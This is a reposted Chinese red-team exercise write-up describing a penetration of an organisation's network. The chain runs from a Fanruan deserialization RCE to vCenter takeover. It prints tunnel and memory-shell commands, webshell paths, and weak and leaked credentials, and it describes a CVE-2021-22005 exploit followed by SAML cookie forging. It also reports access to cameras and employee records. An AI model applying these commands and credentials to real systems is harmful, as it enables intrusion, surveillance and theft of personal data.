记一次某地市h-v-v打穿某重点单位

admin 2024年10月21日16:59:24评论14 views字数 2320阅读7分44秒阅读模式

0x1帆软反序列化漏洞RCE

用工具一把梭哈
https://mci.xxxx.com/webroot/kubriSakJwQVU7Mq.txt

记一次某地市h-v-v打穿某重点单位

url: https://mci.xxxx.com/webroot/*请求头: Referer: Hijt密码: test:test123 使用说明: ./suo5 -H 'Referer: Hijt' -t http://./suo5 -l 0.0.0.0:7788 --auth test:test123 -H 'Referer: Hijt' -t http://冰蝎3.0 内存马注入完成,请自行连接判断!url: https://mci.xxxx.com/webroot/*请求头: moresec: wuhu密码: rebeyondhttps://mci.xxxx.com/webroot/xx   rebeyond

记一次某地市h-v-v打穿某重点单位

11张网卡含docker,这里就不列出来了

记一次某地市h-v-v打穿某重点单位

0x2内网突突突

还有192段的这就不列出来了

172.*.*.*[Vcenter][*] WebTitle https://172.16.10.10      code:200 len:3618   title:" + ID_VC_Welcome + "[*] WebTitle https://172.16.10.10:443/ code:200 len:3618   title:" + ID_VC_Welcome + "[SSH][+] SSH 172.16.10.27:22:admin 1qaz@WSX[+] SSH 172.16.10.25:22:admin 1qaz@WSX[INFO][+] InfoScan https://172.16.10.10      [VMware vSphere] [+] InfoScan https://172.16.10.10:443/ [VMware vSphere] [POC][+] PocScan https://172.16.10.7 poc-yaml-vmware-vrealize-cve-2021-21975-ssrf [+] PocScan https://172.16.10.7 poc-yaml-vmware-vrealize-cve-2021-21975-ssrf

0x2.1服务器权限

利用nacos2024新洞利用后拿下了2个

http://192.168.32.1:8848/nacos/cXsXGBjvVwihgi请求头: Referer: Tixrhttp://192.168.100.131:8848/nacos/xxx"内存马注入成功,密码: Vwihgi 请求头: Referer: Tixr

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

任意文件上传拿下了一个

http://192.168.31.12/Upload/img/1.aspxhvv2028

记一次某地市h-v-v打穿某重点单位

web目录

记一次某地市h-v-v打穿某重点单位

海康综合安防任意用户添加

https://192.168.31.15:443/portal/cas/loginPage?service=https://192.168.31.15:443/portalminio/1qaz@WSX

记一次某地市h-v-v打穿某重点单位

122个摄像头权限(个)放在下面摄像头处

记一次某地市h-v-v打穿某重点单位

海康综合安防第二个

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

边界机器的容器权限100多个

记一次某地市h-v-v打穿某重点单位

0x3数据库19

这里就不一一列出来了,数据比较敏感我怕我进去,这里就放一个图就行了

记一次某地市h-v-v打穿某重点单位

192.168.100.86:3308root/ad123456pwd

记一次某地市h-v-v打穿某重点单位

4w条员工信息,原谅我的厚码

记一次某地市h-v-v打穿某重点单位

0x3nacos11个

就不一一列出了都是Nday弱口令或者绕过进去的要么就是弱口令nacos/nacos

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

0x3.1. grafana1个

http://192.168.32.1:3000/admin/admin@123

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

0x3.2. minio2个

弱口令:

miniominio123

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

0x4. MCI管理权限

存在345个摄像头权限

敏感信息1.8w

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

0x4.内网运维资产表

http://192.168.100.202/

记一次某地市h-v-v打穿某重点单位

0x5. 最后堡垒机权限2个

0x5.1. 192.168.100.197(泛微运维系统)

http://192.168.100.197:9081/#/main/dashboardsysadmin/1qaz@WSX 更改密码为1qaz@WSX

记一次某地市h-v-v打穿某重点单位

172.16.10.10-VcenterCVE-2021-22005

记一次某地市h-v-v打穿某重点单位

https://172.16.10.10/idm/..;/xx.jsp

记一次某地市h-v-v打穿某重点单位

vCenter中从/storage/db/vmware-vmdir/data.mdb提取IdP证书,为管理员⽤户创建 SAML请求最后使⽤ vCenterserver进⾏身份验证并获得有效的管理员 cookie

记一次某地市h-v-v打穿某重点单位

利⽤ SAML解密脚本生成 Cookie

python vcenter_saml_login.py -p data.mdb -t 172.16.10.10Cookie: VSPHERE-UI-JSESSIONID=3AEBD996A696016ED81D3F411BB1B197

记一次某地市h-v-v打穿某重点单位

拿到管理员 cookie 之后在用插件替换 cookie 访问/ui 就可直接登录,这里需要删除默认的 sessionid,直接添加新的 cookie

记一次某地市h-v-v打穿某重点单位

成功登录到后台

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

0x5.2. 域名权限2

这里是通过vcenter直接登录的没锁屏直接登上来了,哈哈哈

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

还有些别的web权限就不说了,此次hw让我学到vcenter后渗透+泛微运维系统的重置密码,文章中 有些不理解可加星球和我细聊或私信我公众号也可以哦大佬们!

星球介绍

星球致力于真实红队,hw、src、apt等技术分享,还有就是星球刚创建不久,资料什么都在着手分享,大家需要什么直接评论或者留言,一起进步一起学习,有想法的师傅可以一起运营。

最近更新

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

记一次某地市h-v-v打穿某重点单位

原文始发于微信公众号(web安全初心实验室):记一次某地市h-v-v打穿某重点单位

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日16:59:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次某地市h-v-v打穿某重点单位https://cn-sec.com/archives/3293473.html

发表评论

匿名网友 填写信息